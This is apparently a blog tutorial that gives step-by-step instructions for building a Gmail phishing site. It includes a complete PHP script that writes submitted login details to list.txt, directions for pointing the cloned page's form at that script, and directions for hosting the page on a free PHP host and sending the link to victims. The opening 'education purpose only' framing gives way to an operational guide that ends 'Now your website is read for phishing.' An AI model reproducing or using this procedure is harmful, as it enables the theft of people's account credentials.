What is Phishing?
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
Note: This is for education purpose only.
Follow the following steps:
2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.
3. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. It should make a PHP file in the folder. If you dont find any PHP file than save the file with quotations like "phish.php" , it should make a php file.
In addition to the phish.php page, create a new empty text file and name it list.txt.
CODE:
CODE:
------------------------------------------------------------------------------------------------------------
<?phpheader("Location: http://www.gmail.com.com");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------------------------------------
5. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.
6. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
7. Save the file and.rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
8.Now you'll need a free web hosting service that supports PHP.
Go to http://www.google.com and search for free web hosting websites.
Choose any one of a website. I'll reccommend to choose either 00webhost.com or 5gbfree.com(I used this one).
9.Sign Up for a free account. After Signing up, go to the website and than login with your account.
It will take you to the C-panel X, . there go to the file manager and choose webroot as directory.
A new tab will open up. There up load all the file index.html, list.txt and PHP file.
When uploading change the permission of the list.txt to 777 by ticking all the boxes.
Now your website is read for phishing.
Now send the your website domain name to the salve. You can find the domain name of your wesite in the C-panel.
Whenever someone will login with you fake page its user name and password will be saved in list.txt, you can go to file manager and view it from there.
If any problem persist let me know in the comments.